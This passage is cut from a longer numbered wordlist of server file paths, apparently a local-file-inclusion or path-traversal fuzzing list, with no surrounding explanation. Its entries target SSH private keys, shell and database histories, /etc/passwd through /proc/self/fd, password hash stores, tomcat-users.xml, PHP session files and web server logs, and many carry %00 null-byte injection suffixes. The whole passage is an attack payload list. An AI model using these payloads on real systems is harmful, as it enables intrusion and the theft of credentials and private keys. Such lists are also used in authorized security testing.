/proc/self/fd/26 690 | /proc/self/fd/27 691 | /proc/self/fd/28 692 | /proc/self/fd/29 693 | /proc/self/fd/3 694 | /proc/self/fd/30 695 | /proc/self/fd/31 696 | /proc/self/fd/32 697 | /proc/self/fd/33 698 | /proc/self/fd/34 699 | /proc/self/fd/35 700 | /proc/self/fd/35/etc/passwd%00 701 | /proc/self/fd/4 702 | /proc/self/fd/5 703 | /proc/self/fd/6 704 | /proc/self/fd/7 705 | /proc/self/fd/8 706 | /proc/self/fd/9 707 | /proc/self/mounts 708 | /proc/self/stat 709 | /proc/self/status 710 | /proc/version 711 | /.profile 712 | .profile 713 | /program 714 | /Program Files\Apache Group\Apache2\conf\httpd.conf 715 | \Program Files\Apache Group\Apache2\conf\httpd.conf 716 | /Program Files\Apache Group\Apache2\conf\httpd.conf%00 717 | /Program Files\Apache Group\Apache\conf\httpd.conf 718 | \Program Files\Apache Group\Apache\conf\httpd.conf 719 | /Program Files\Apache Group\Apache\conf\httpd.conf%00 720 | /Program Files\Apache Group\Apache\logs\access.log 721 | \Program Files\Apache Group\Apache\logs\access.log 722 | /Program Files\Apache Group\Apache\logs\access.log%00 723 | /Program Files\Apache Group\Apache\logs\error.log 724 | \Program Files\Apache Group\Apache\logs\error.log 725 | /Program Files\Apache Group\Apache\logs\error.log%00 726 | /Program Files\xampp\apache\conf\httpd.conf 727 | /Program Files\xampp\apache\conf\httpd.conf%00 728 | \Program Files\xampp\apache\conf\httpd.confetc/passwd 729 | /.psql_history 730 | .psql_history 731 | /root/.bash_config 732 | /root/.bash_history 733 | /root/.bash_logout 734 | /root/.bashrc 735 | /root/.ksh_history 736 | /root/.xauthority 737 | /routing.yml 738 | /security.yml 739 | /services.yml 740 | /sftp-config.json 741 | .sh_history 742 | /sites/default/default.settings.php 743 | /sites/default/settings.php 744 | /.sqlite_history 745 | .sqlite_history 746 | /srv/www/htdos/squirrelmail/config/config.php 747 | /.ssh/authorized_keys 748 | .ssh/authorized_keys 749 | /.ssh/config 750 | .ssh/config 751 | /.ssh/id_dsa 752 | .ssh/id_dsa 753 | /.ssh/id_dsa.pub 754 | .ssh/id_dsa.pub 755 | /.ssh/identity 756 | .ssh/identity 757 | /.ssh/identity.pub 758 | .ssh/identity.pub 759 | /.ssh/id_rsa 760 | .ssh/id_rsa 761 | /.ssh/id_rsa.pub 762 | .ssh/id_rsa.pub 763 | /.ssh/known_hosts 764 | .ssh/known_hosts 765 | /.subversion/servers 766 | .subversion/servers 767 | /system/library/webobjects/adaptors/apache2.2/apache.conf 768 | /.tconn/tconn.conf 769 | .tconn/tconn.conf 770 | /tmp/access.log 771 | /tmp/[jboss]/server/default/conf/jboss-minimal.xml 772 | /tmp/[jboss]/server/default/conf/jboss-service.xml 773 | /tmp/[jboss]/server/default/conf/jndi.properties 774 | /tmp/[jboss]/server/default/conf/log4j.xml 775 | /tmp/[jboss]/server/default/conf/login-config.xml 776 | /tmp/[jboss]/server/default/conf/server.log.properties 777 | /tmp/[jboss]/server/default/conf/standardjaws.xml 778 | /tmp/[jboss]/server/default/conf/standardjboss.xml 779 | /tmp/[jboss]/server/default/deploy/jboss-logging.xml 780 | /tmp/[jboss]/server/default/log/boot.log 781 | /tmp/[jboss]/server/default/log/server.log 782 | /tmp/sess_ 783 | /typo3conf/localconf.php 784 | /usr/apache2/conf/httpd.conf 785 | /usr/apache2/conf/httpd.conf%00 786 | /usr/apache/conf/httpd.conf 787 | /usr/apache/conf/httpd.conf%00 788 | /usr/etc/pure-ftpd.conf 789 | /usr/etc/pure-ftpd.conf%00 790 | /usr/home/user/lighttpd/lighttpd.conf 791 | /usr/home/user/var/log/apache.log 792 | /usr/home/user/var/log/lighttpd.error.log 793 | /usr/internet/pgsql/data/pg_hba.conf 794 | /usr/internet/pgsql/data/postmaster.log 795 | /usr/lib/cron/log 796 | /usr/lib/php.ini 797 | /usr/lib/php.ini%00 798 | /usr/lib/php/php.ini 799 | /usr/lib/php/php.ini%00 800 | /usr/lib/security/mkuser.default 801 | /usr/lib/security/mkuser.default%00 802 | /usr/local/apache1.3/conf/httpd.conf 803 | /usr/local/apache22/conf/httpd.conf 804 | /usr/local/apache22/httpd.conf 805 | /usr/local/apache2/apache2.conf 806 | /usr/local/apache2/apache.conf 807 | /usr/local/apache2/conf/apache2.conf 808 | /usr/local/apache2/conf/apache.conf 809 | /usr/local/apache2/conf/extra/httpd-ssl.conf 810 | /usr/local/apache2/conf/httpd.conf 811 | /usr/local/apache2/conf/httpd.conf%00 812 | /usr/local/apache2/conf/modsec.conf 813 | /usr/local/apache2/conf/ssl.conf 814 | /usr/local/apache2/conf/vhosts.conf 815 | /usr/local/apache2/conf/vhosts-custom.conf 816 | /usr/local/apache2/httpd.conf 817 | /usr/local/apache2/httpd.conf%00 818 | /usr/local/apache2/logs/access_log 819 | /usr/local/apache2/logs/access.log 820 | /usr/local/apache2/logs/access_log%00 821 | /usr/local/apache2/logs/access.log%00 822 | /usr/local/apache2/logs/audit_log 823 | /usr/local/apache2/logs/error_log 824 | /usr/local/apache2/logs/error.log 825 | /usr/local/apache2/logs/error_log%00 826 | /usr/local/apache2/logs/error.log%00 827 | /usr/local/apache2/logs/lighttpd.error.log 828 | /usr/local/apache2/logs/lighttpd.log 829 | /usr/local/apache/apache2.conf 830 | /usr/local/apache/apache.conf 831 | /usr/local/apache/conf/access.conf 832 | /usr/local/apache/conf/apache2.conf 833 | /usr/local/apache/conf/apache.conf 834 | /usr/local/apache/conf/httpd.conf 835 | /usr/local/apache/conf/httpd.conf%00 836 | /usr/local/apache/conf/httpd.conf.default 837 | /usr/local/apache/conf/modsec.conf 838 | /usr/local/apache/conf/php.ini 839 | /usr/local/apache/conf/php.ini%00 840 | /usr/local/apache/conf/vhosts.conf 841 | /usr/local/apache/conf/vhosts-custom.conf 842 | /usr/local/apache/httpd.conf 843 | /usr/local/apache/httpd.conf%00 844 | /usr/local/apache/logs/access_log 845 | /usr/local/apache/logs/access_log 846 | /usr/local/apache/logs/access.log 847 | /usr/local/apache/logs/access.log 848 | /usr/local/apache/logs/access_ log%00 849 | /usr/local/apache/logs/access_log%00 850 | /usr/local/apache/logs/access. log%00 851 | /usr/local/apache/logs/access.log%00 852 | /usr/local/apache/logs/audit_log 853 | /usr/local/apache/logs/error_log 854 | /usr/local/apache/logs/error_log 855 | /usr/local/apache/logs/error.log 856 | /usr/local/apache/logs/error.log 857 | /usr/local/apache/logs/error_log%00 858 | /usr/local/apache/logs/error.log%00 859 | /usr/local/apache/logs/lighttpd.error.log 860 | /usr/local/apache/logs/lighttpd.log 861 | /usr/local/apache/logs/mod_jk.log 862 | /usr/local/apps/apache22/conf/httpd.conf 863 | /usr/local/apps/apache2/conf/httpd.conf 864 | /usr/local/apps/apache2/conf/httpd.conf%00 865 | /usr/local/apps/apache/conf/httpd.conf 866 | /usr/local/apps/apache/conf/httpd.conf%00 867 | /usr/local/cpanel/logs 868 | /usr/local/cpanel/logs%00 869 | /usr/local/cpanel/logs/access_log 870 | /usr/local/cpanel/logs/access_log%00 871 | /usr/local/cpanel/logs/error_log 872 | /usr/local/cpanel/logs/error_log%00 873 | /usr/local/cpanel/logs/license_log 874 | /usr/local/cpanel/logs/license_log%00 875 | /usr/local/cpanel/logs/login_log 876 | /usr/local/cpanel/logs/login_log%00 877 | /usr/local/cpanel/logs/stats_log 878 | /usr/local/cpanel/logs/stats_log%00 879 | /usr/local/etc/apache22/conf/httpd.conf 880 | /usr/local/etc/apache22/httpd.conf 881 | /usr/local/etc/apache2/conf/httpd.conf 882 | /usr/local/etc/apache2/conf/httpd.conf%00 883 | /usr/local/etc/apache2/httpd.conf 884 | /usr/local/etc/apache2/vhosts.conf 885 | /usr/local/etc/apache/conf/httpd.conf 886 | /usr/local/etc/apache/conf/httpd.conf%00 887 | /usr/local/etc/apache/httpd.conf 888 | /usr/local/etc/apache/vhosts.conf 889 | /usr/local/etc/apache/vhosts.conf%00 890 | /usr/local/etc/httpd/conf 891 | /usr/local/etc/httpd/conf/httpd.conf 892 | /usr/local/etc/httpd/conf/httpd.conf%00 893 | /usr/local/etc/lighttpd.conf 894 | /usr/local/etc/lighttpd.conf.new 895 | /usr/local/etc/nginx/nginx.conf 896 | /usr/local/etc/php.ini 897 | /usr/local/etc/php.ini%00 898 | /usr/local/etc/pure-ftpd.conf 899 | /usr/local/etc/pure-ftpd.conf%00 900 | /usr/local/etc/pureftpd.pdb 901 | /usr/local/etc/pureftpd.pdb%00 902 | /usr/local/etc/smb.conf 903 | /usr/local/etc/webmin/miniserv.conf 904 | /usr/local/etc/webmin/miniserv.users 905 | /usr/local/httpd/conf/httpd.conf 906 | /usr/local/httpd/conf/httpd.conf%00 907 | /usr/local/jakarta/dist/tomcat/conf/context.xml 908 | /usr/local/jakarta/dist/tomcat/conf/jakarta.conf 909 | /usr/local/jakarta/dist/tomcat/conf/logging.properties 910 | /usr/local/jakarta/dist/tomcat/conf/server.xml 911 | /usr/local/jakarta/dist/tomcat/conf/workers.properties 912 | /usr/local/jakarta/dist/tomcat/logs/mod_jk.log 913 | /usr/local/jakarta/tomcat/conf/context.xml 914 | /usr/local/jakarta/tomcat/conf/jakarta.conf 915 | /usr/local/jakarta/tomcat/conf/logging.properties 916 | /usr/local/jakarta/tomcat/conf/server.xml 917 | /usr/local/jakarta/tomcat/conf/workers.properties 918 | /usr/local/jakarta/tomcat/logs/catalina.err 919 | /usr/local/jakarta/tomcat/logs/catalina.out 920 | /usr/local/jakarta/tomcat/logs/mod_jk.log 921 | /usr/local/[jboss]/server/default/conf/jboss-minimal.xml 922 | /usr/local/[jboss]/server/default/conf/jboss-service.xml 923 | /usr/local/[jboss]/server/default/conf/jndi.properties 924 | /usr/local/[jboss]/server/default/conf/log4j.xml 925 | /usr/local/[jboss]/server/default/conf/login-config.xml 926 | /usr/local/[jboss]/server/default/conf/server.log.properties 927 | /usr/local/[jboss]/server/default/conf/standardjaws.xml 928 | /usr/local/[jboss]/server/default/conf/standardjboss.xml 929 | /usr/local/[jboss]/server/default/deploy/jboss-logging.xml 930 | /usr/local/[jboss]/server/default/log/boot.log 931 | /usr/local/[jboss]/server/default/log/server.log 932 | /usr/local/lib/php.ini 933 | /usr/local/lib/php.ini%00 934 | /usr/local/lighttpd/conf/lighttpd.conf 935 | /usr/local/lighttpd/log/access.log 936 | /usr/local/lighttpd/log/lighttpd.error.log 937 | /usr/local/logs/access.log 938 | /usr/local/logs/samba.log 939 | /usr/local/lsws/conf/httpd_conf.xml 940 | /usr/local/lsws/logs/error.log 941 | /usr/local/mysql/data/{host}.err 942 | /usr/local/mysql/data/mysql-bin.index 943 | /usr/local/mysql/data/mysql-bin.log 944 | /usr/local/mysql/data/mysqlderror.log 945 | /usr/local/mysql/data/mysql.err 946 | /usr/local/mysql/data/mysql.log 947 | /usr/local/mysql/data/mysql-slow.log 948 | /usr/local/nginx/conf/nginx.conf 949 | /usr/local/pgsql/bin/pg_passwd 950 | /usr/local/pgsql/data/passwd 951 | /usr/local/pgsql/data/pg_hba.conf 952 | /usr/local/pgsql/data/pg_log 953 | /usr/local/pgsql/data/postgresql.conf 954 | /usr/local/pgsql/data/postgresql.log 955 | /usr/local/php4/apache2.conf 956 | /usr/local/php4/apache2.conf.php 957 | /usr/local/php4/apache.conf 958 | /usr/local/php4/apache.conf.php 959 | /usr/local/php4/httpd.conf 960 | /usr/local/php4/httpd.conf%00 961 | /usr/local/php4/httpd.conf.php 962 | /usr/local/php4/httpd.conf.php%00 963 | /usr/local/php4/lib/php.ini 964 | /usr/local/php4/lib/php.ini%00 965 | /usr/local/php5/apache2.conf 966 | /usr/local/php5/apache2.conf.php 967 | /usr/local/php5/apache.conf 968 | /usr/local/php5/apache.conf.php 969 | /usr/local/php5/httpd.conf 970 | /usr/local/php5/httpd.conf%00 971 | /usr/local/php5/httpd.conf.php 972 | /usr/local/php5/httpd.conf.php%00 973 | /usr/local/php5/lib/php.ini 974 | /usr/local/php5/lib/php.ini%00 975 | /usr/local/php/apache2.conf 976 | /usr/local/php/apache2.conf.php 977 | /usr/local/php/apache.conf 978 | /usr/local/php/apache.conf.php 979 | /usr/local/php/httpd.conf 980 | /usr/local/php/httpd.conf%00 981 | /usr/local/php/httpd.conf.php 982 | /usr/local/php/httpd.conf.php%00 983 | /usr/local/php/lib/php.ini 984 | /usr/local/php/lib/php.ini%00 985 | /usr/local/psa/admin/conf/php.ini 986 | /usr/local/psa/admin/conf/site_isolation_settings.ini 987 | /usr/local/psa/admin/htdocs/domains/databases/phpmyadmin/libraries/config.default.php 988 | /usr/local/psa/admin/logs/httpsd_access_log 989 | /usr/local/psa/admin/logs/panel.log 990 | /usr/local/pureftpd/etc/pure-ftpd.conf 991 | /usr/local/pureftpd/etc/pure-ftpd.conf%00 992 | /usr/local/pureftpd/etc/pureftpd.pdb 993 | /usr/local/pureftpd/etc/pureftpd.pdb%00 994 | /usr/local/pureftpd/sbin/pure-config.pl 995 | /usr/local/pureftpd/sbin/pure-config.pl%00 996 | /usr/local/samba/lib/log.user 997 | /usr/local/samba/lib/smb.conf.user 998 | /usr/local/sb/config 999 | /usr/local/squirrelmail/www/readme 1000 | /usr/local/zend/etc/php.ini 1001 | /usr/local/Zend/etc/php.ini 1002 | /usr/local/Zend/etc/php.ini%00 1003 | /usr/local/zeus/web/global.cfg 1004 | /usr/local/zeus/web/log/errors 1005 | /usr/pkg/etc/httpd/httpd.conf 1006 | /usr/pkg/etc/httpd/httpd-default.conf 1007 | /usr/pkg/etc/httpd/httpd-vhosts.conf 1008 | /usr/pkgsrc/net/pureftpd/ 1009 | /usr/pkgsrc/net/pureftpd/%00 1010 | /usr/pkgsrc/net/pureftpd/pure-ftpd.conf 1011 | /usr/pkgsrc/net/pureftpd/pureftpd.passwd 1012 | /usr/pkgsrc/net/pureftpd/pureftpd.pdb 1013 | /usr/ports/contrib/pure-ftpd/ 1014 | /usr/ports/contrib/pure-ftpd/%00 1015 | /usr/ports/contrib/pure-ftpd/pure-ftpd.conf 1016 | /usr/ports/contrib/pure-ftpd/pureftpd.passwd 1017 | /usr/ports/contrib/pure-ftpd/pureftpd.pdb 1018 | /usr/ports/ftp/pure-ftpd/ 1019 | /usr/ports/ftp/pure-ftpd/%00 1020 | /usr/ports/ftp/pure-ftpd/pure-ftpd.conf 1021 | /usr/ports/ftp/pure-ftpd/pureftpd.passwd 1022 | /usr/ports/ftp/pure-ftpd/pureftpd.pdb 1023 | /usr/ports/net/pure-ftpd/ 1024 | /usr/ports/net/pure-ftpd/%00 1025 | /usr/ports/net/pure-ftpd/pure-ftpd.conf 1026 | /usr/ports/net/pure-ftpd/pureftpd.passwd 1027 | /usr/ports/net/pure-ftpd/pureftpd.pdb 1028 | /usr/sbin/mudlogd 1029 | /usr/sbin/mudpasswd 1030 | /usr/sbin/pure-config.pl 1031 | /usr/sbin/pure-config.pl%00 1032 | /usr/share/adduser/adduser.conf 1033 | /usr/share/logs/catalina.err 1034 | /usr/share/logs/catalina.out 1035 | /usr/share/squirrelmail/config/config.php 1036 | /usr/share/squirrelmail/plugins/squirrel_logger/setup.php 1037 | /usr/share/tomcat6/conf/context.xml 1038 | /usr/share/tomcat6/conf/logging.properties 1039 | /usr/share/tomcat6/conf/server.xml 1040 | /usr/share/tomcat6/conf/workers.properties 1041 | /usr/share/tomcat6/logs/catalina.err 1042 | /usr/share/tomcat6/logs/catalina.out 1043 | /usr/share/tomcat/logs/catalina.err 1044 | /usr/share/tomcat/logs/catalina.out 1045 | /usr/share/webshells/php/php-reverse-shell.php 1046 | /usr/spool/lp/log 1047 | /usr/spool/mqueue/syslog 1048 | /var/adm/acct/sum/loginlog 1049 | /var/adm/aculog 1050 | /var/adm/aculogs 1051 | /var/adm/crash/unix 1052 | /var/adm/crash/vmcore 1053 | /var/adm/cron/log 1054 | /var/adm/dtmp 1055 | /var/adm/lastlog 1056 | /var/adm/lastlog/username 1057 | /var/adm/log/asppp.log 1058 | /var/adm/loginlog 1059 | /var/adm/log/xferlog 1060 | /var/adm/log/xferlog%00 1061 | /var/adm/lp/lpd-errs 1062 | /var/adm/messages 1063 | /var/adm/messages.0 1064 | /var/adm/messages.1 1065 | /var/adm/messages.2 1066 | /var/adm/messages.3 1067 | /var/adm/pacct 1068 | /var/adm/qacct 1069 | /var/adm/ras/bootlog 1070 | /var/adm/ras/errlog 1071 | /var/adm/sulog 1072 | /var/adm/syslog 1073 | /var/adm/utmp 1074 | /var/adm/utmpx 1075 | /var/adm/vold.log 1076 | /var/adm/wtmp 1077 | /var/adm/wtmpx 1078 | /var/adm/x0msgs 1079 | /var/apache/conf/httpd.conf 1080 | /var/cpanel/cpanel.config 1081 | /var/cpanel/cpanel.config%00 1082 | /var/cpanel/tomcat.options 1083 | /var/cron/log 1084 | /var/data/mysql-bin.index 1085 | /var/db/shadow/hash 1086 | /var/lib/mysql/my.cnf 1087 | /var/lib/mysql/my.cnf%00 1088 | /var/lib/pgsql/data/postgresql.conf 1089 | /var/lib/php5/session/sess_ 1090 | /var/lib/php/session/sess_ 1091 | /var/lib/squirrelmail/prefs/squirrelmail.log 1092 | /var/lib/tomcat6/conf/tomcat-users.xml 1093 | /var/lib/tomcat7/conf/tomcat-users.xml 1094 | /var/lib/tomcat8/conf/tomcat-users.xml 1095 | /var/lighttpd.log 1096 | /var/local/www/conf/php.ini 1097 | /var/local/www/conf/php.ini%00 1098 | /var/log/access_log 1099 | /var/log/access_log 1100 | /var/log/access.log 1101 | /var/log/access.log 1102 | /var/log/access_log%00 1103 | /var/log/access.log%00 1104 | /var/log/apache2/access_log 1105 | /var/log/apache2/access_log 1106 | /var/log/apache2/access.log 1107 | /var/log/apache2/access.log 1108 | /var/log/apache2/access_log%00 1109 | /var/log/apache2/access.log%00 1110 | /var/log/apache2/error_log 1111 | /var/log/apache2/error_log 1112 | /var/log/apache2/error.log 1113 | /var/log/apache2/error.log 1114 | /var/log/apache2/error_log%00 1115 | /var/log/apache2/error.log%00 1116 | /var/log/apache2/squirrelmail.err.log 1117 | /var/log/apache2/squirrelmail.log 1118 | /var/log/apache/access_log 1119 | /var/log/apache/access_log 1120 | /var/log/apache/access.log 1121 | /var/log/apache/access.log 1122 | /var/log/apache/access_log%00 1123 | /var/log/apache/access.log%00 1124 | /var/log/apache/error_log 1125 | /var/log/apache/error_log 1126 | /var/log/apache/error.log 1127 | /var/log/apache/error.log 1128 | /var/log/apache/error_log%00 1129 | /var/log/apache/error.log%00 1130 | /var/log/authlog 1131 | /var/log/auth.log 1132 | /var/log/auth.log.0 1133 | /var/log/auth.log.0.gz 1134 | /var/log/auth.log.1 1135 | /var/log/auth.log.1.gz 1136 | /var/log/auth.log.2 1137 | /var/log/auth.log.2.gz 1138 | /var/log/auth.log.3 1139 | /var/log/auth.log.3.gz 1140 | /var/log/boot.log 1141 | /var/log/cron/var/log/postgres.log 1142 | /var/log/daemon.log 1143 | /var/log/daemon.log.1 1144 | /var/log/data/mysql-bin.index 1145 | /var/log/error_log 1146 | /var/log/error_log 1147 | /var/log/error.log 1148 | /var/log/error.log 1149 | /var/log/error_log%00 1150 | /var/log/error.log%00 1151 | /var/log/exim_mainlog 1152 | /var/log/exim/mainlog 1153 | /var/log/exim_mainlog%00 1154 | /var/log/exim/mainlog%00 1155 | /var/log/exim_paniclog 1156 | /var/log/exim/paniclog 1157 | /var/log/exim_paniclog%00 1158 | /var/log/exim/paniclog%00 1159 | /var/log/exim_rejectlog 1160 | /var/log/exim/rejectlog 1161 | /var/log/exim/rejectlog%00 1162 | /var/log/exim_rejectlog%00/etc/issue 1163 | /var/log/exim_rejectlog/etc/passwd 1164 | /var/log/ftplog 1165 | /var/log/ftplog%00 1166 | /var/log/ftp-proxy 1167 | /var/log/ftp-proxy%00 1168 | /var/log/ftp-proxy/ftp-proxy.log 1169 | /var/log/ftp-proxy/ftp-proxy.log%00 1170 | /var/log/httpd/access_log 1171 | /var/log/httpd/access.log 1172 | /var/log/httpd/access_log%00 1173 | /var/log/httpd/access.log%00 1174 | /var/log/httpd/error_log 1175 | /var/log/httpd/error.log 1176 | /var/log/httpd/error_log%00 1177 | /var/log/httpd/error.log%00 1178 | /var/log/ipfw 1179 | /var/log/ipfw/ipfw.log 1180 | /var/log/ipfw.log 1181 | /var/log/ipfw.today 1182 | /var/log/kernel.log 1183 | /var/log/kern.log 1184 | /var/log/kern.log.1 1185 | /var/log/lastlog 1186 | /var/log/lighttpd/ 1187 | /var/log/lighttpd/access.log 1188 | /var/log/lighttpd.access.log 1189 | /var/log/lighttpd/access.www.log 1190 | /var/log/lighttpd/{domain}/access.log 1191 | /var/log/lighttpd/{domain}/error.log 1192 | /var/log/lighttpd/error.log 1193 | /var/log/lighttpd.error.log 1194 | /var/log/lighttpd/error.www.log 1195 | /var/log/log.smb 1196 | /var/log/mail.err 1197 | /var/log/mail.info 1198 | /var/log/maillog 1199 | /var/log/mail.log 1200 | /var/log/maillog%00 1201 | /var/log/mail.warn 1202 | /var/log/messages 1203 | /var/log/messages.0 1204 | /var/log/messages.0.gz 1205 | /var/log/messages.1 1206 | /var/log/messages.1.gz 1207 | /var/log/messages.2 1208 | /var/log/messages.2.gz 1209 | /var/log/messages.3 1210 | /var/log/messages.3.gz 1211 | /var/log/messages.log 1212 | /var/log/muddleftpd 1213 | /var/log/muddleftpd.conf 1214 | /var/log/mysql-bin.index 1215 | /var/log/mysql/data/mysql-bin.index 1216 | /var/log/mysqlderror.log 1217 | /var/log/mysqlderror.log%00 1218 | /var/log/mysql.err 1219 | /var/log/mysql.log 1220 | /var/log/mysql.log%00 1221 | /var/log/mysql/mysql-bin.index 1222 | /var/log/mysql/mysql-bin.log 1223 | /var/log/mysql/mysql-bin.log%00 1224 | /var/log/mysql/mysql.log 1225 | /var/log/mysql/mysql.log%00 1226 | /var/log/mysql/mysql-slow.log 1227 | /var/log/mysql/mysql-slow.log%00 1228 | /var/log/news.all 1229 | /var/log/news/news.all 1230 | /var/log/news/news.crit 1231 | /var/log/news/news.err 1232 | /var/log/news/news.notice 1233 | /var/log/news/suck.err 1234 | /var/log/news/suck.notice 1235 | /var/log/nginx/access_log 1236 | /var/log/nginx/access.log 1237 | /var/log/nginx.access_log 1238 | /var/log/nginx/error_log 1239 | /var/log/nginx/error.log 1240 | /var/log/nginx.error_log 1241 | /var/log/pgsql8.log 1242 | /var/log/pgsql_log 1243 | /var/log/pgsql/pgsql.log 1244 | /var/log/pm-powersave.log 1245 | /var/log/poplog 1246 | /var/log/postgres/pg_backup.log 1247 | /var/log/postgres/postgres.log 1248 | /var/log/postgresql.log 1249 | /var/log/postgresql/main.log 1250 | /var/log/postgresql/postgres.log 1251 | /var/log/postgresql/postgresql-8.1-main.log 1252 | /var/log/postgresql/postgresql-8.3-main.log 1253 | /var/log/postgresql/postgresql-8.4-main.log 1254 | /var/log/postgresql/postgresql-9.0-main.log 1255 | /var/log/postgresql/postgresql-9.1-main.log 1256 | /var/log/postgresql/postgresql.log 1257 | /var/log/proftpd 1258 | /var/log/proftpd%00 1259 | /var/log/proftpd.access_log 1260 | /var/log/proftpd.xferlog 1261 | /var/log/proftpd/xferlog.legacy 1262 | /var/log/pureftpd.log 1263 | /var/log/pureftpd.log%00 1264 | /var/log/pure-ftpd/pure-ftpd.log 1265 | /var/log/pure-ftpd/pure-ftpd.log%00 1266 | /var/logs/access.log 1267 | /var/log/samba.log 1268 | /var/log/samba.log1 1269 | /var/log/samba.log2 1270 | /var/log/samba/log.nmbd 1271 | /var/log/samba/log.smbd 1272 | /var/log/secure.log 1273 | /var/log/squirrelmail.log 1274 | /var/log/sso/sso.log 1275 | /var/log/sw-cp-server/error_log 1276 | /var/log/syslog 1277 | /var/log/syslog.0 1278 | /var/log/syslog.0.gz 1279 | /var/log/syslog.1 1280 | /var/log/syslog.1.gz 1281 | /var/log/syslog.2 1282 | /var/log/syslog.2.gz 1283 | /var/log/syslog.3 1284 | /var/log/syslog.3.gz 1285 | /var/log/syslog.log 1286 | /var/log/tomcat6/catalina.out 1287 | /var/log/ufw.log 1288 | /var/log/user.log 1289 | /var/log/user.log.1 1290 | /var/log/vmware/hostd-1.log 1291 | /var/log/vmware/hostd.log 1292 | /var/log/vsftpd.log 1293 | /var/log/vsftpd.log%00 1294 | /var/log/webmin/miniserv.log 1295 | /var/log/wtmp 1296 | /var/log/xferlog 1297 | /var/log/xferlog%00 1298 | /var/log/xorg.0.log 1299 | /var/lp/logs/lpnet 1300 | /var/lp/logs/lpsched 1301 | /var/lp/logs/requests 1302 | /var/mail/apache 1303 | /var/mail/nobody 1304 | /var/mail/www 1305 | /var/mail/www-data 1306 | /var/mysql-bin.index 1307 | /var/mysql.log 1308 | /var/mysql.log%00 1309 | /var/nm2/postgresql.conf 1310 | /var/postgresql/db/postgresql.conf 1311 | /var/postgresql/log/postgresql.log 1312 | /var/root/.bash_history 1313 | /var/root/.sh_history 1314 | /var/run/utmp 1315 | /var/saf/_log 1316 | /var/saf/port/log 1317 | /var/www/.bash_history 1318 | /var/www/conf 1319 | /var/www/conf/httpd.conf 1320 | /var/www/conf/httpd.conf%00 1321 | /var/www/config.php 1322 | /var/www/html/squirrelmail-1.2.9/config/config.php 1323 | /var/www/html/squirrelmail/config/config.php 1324 | /var/www/.lighttpdpassword 1325 | /var/www/logs/access_log 1326 | /var/www/logs/access_log 1327 | /var/www/logs/access.log 1328 | /var/www/logs/access.log 1329 | /var/www/logs/access_log%00 1330 | /var/www/logs/access.log%00 1331 | /var/www/logs/error_log 1332 | /var/www/logs/error_log 1333 | /var/www/logs/error.log 1334 | /var/www/logs/error.log 1335 | /var/www/logs/error_log%00 1336 | /var/www/logs/error.log%00 1337 | /var/www/mgr/logs/access_log 1338 | /var/www/mgr/logs/access.log 1339 | /var/www/mgr/logs/error_log 1340 | /var/www/mgr/logs/error.log 1341 | /var/www/squirrelmail/config/config.php 1342 | /.vidalia/vidalia.conf 1343 | .vidalia/vidalia.conf 1344 | /volumes/macintosh_hd1/opt/apache2/conf/httpd.conf 1345 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf 1346 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00 1347 | /volumes/macintosh_hd1/opt/apache/conf/httpd.conf 1348 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf 1349 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00 1350 | /volumes/macintosh_hd1/opt/httpd/conf/httpd.conf 1351 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf 1352 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00 1353 | /volumes/macintosh_hd1/usr/local/php4/httpd.conf.php 1354 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php 1355 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00 1356 | /volumes/macintosh_hd1/usr/local/php5/httpd.conf.php 1357 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php 1358 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00 1359 | /volumes/macintosh_hd1/usr/local/php/httpd.conf.php 1360 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php 1361 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00 1362 | /volumes/macintosh_hd1/usr/local/php/lib/php.ini 1363 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini 1364 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00 1365 | /volumes/webbackup/opt/apache2/conf/httpd.conf 1366 | /Volumes/webBackup/opt/apache2/conf/httpd.conf 1367 | /Volumes/webBackup/opt/apache2/conf/httpd.conf%00 1368 | /volumes/webbackup/private/etc/httpd/httpd.conf 1369 | /Volumes/webBackup/private/etc/httpd/httpd.conf 1370 | /Volumes/webBackup/private/etc/httpd/httpd.conf%00 1371 | /volumes/webbackup/private/etc/httpd/httpd.conf.default 1372 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default 1373 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default%00 1374 | /wamp/bin/apache/apache2.2.21/conf/httpd.conf 1375 | /wamp/bin/apache/apache2.2.21/logs/access.log 1376 | /wamp/bin/apache/apache2.2.21/logs/error.log 1377 | /wamp/bin/apache/apache2.2.21/wampserver.conf 1378 | /wamp/bin/apache/apache2.2.22/conf/httpd.conf 1379 | /wamp/bin/apache/apache2.2.22/conf/wampserver.conf 1380 | /wamp/bin/apache/apache2.2.22/logs/access.log 1381 | /wamp/bin/apache/apache2.2.22/logs/error.log 1382 | /wamp/bin/apache/apache2.2.22/wampserver.conf 1383 | /wamp/bin/mysql/mysql5.5.16/data/mysql-bin.index 1384 | /wamp/bin/mysql/mysql5.5.16/my.ini 1385 | /wamp/bin/mysql/mysql5.5.16/wampserver.conf 1386 | /wamp/bin/mysql/mysql5.5.24/data/mysql-bin.index 1387 | /wamp/bin/mysql/mysql5.5.24/my.ini 1388 | /wamp/bin/mysql/mysql5.5.24/wampserver.conf 1389 | /wamp/bin/php/php5.3.8/php.ini 1390 | /wamp/bin/php/php5.4.3/php.ini 1391 | /wamp/logs/access.log 1392 | /wamp/logs/apache_error.log 1393 | /wamp/logs/genquery.log 1394 | /wamp/logs/mysql.log 1395 | /wamp/logs/slowquery.log 1396 | /Web.config 1397 | /web/conf/php.ini 1398 | /web/conf/php.ini%00 1399 | /windows/comsetup.log 1400 | /windows/debug/netsetup.log 1401 | /windows/odbc.ini 1402 | /windows/php.ini 1403 | /WINDOWS\php.ini 1404 | /WINDOWS\php.ini%00 1405 | /windows/repair/setup.log 1406 | /windows/setupact.log 1407 | /windows/setupapi.log 1408 | /windows/setuperr.log 1409 | /windows/system32/drivers/etc/hosts 1410 | 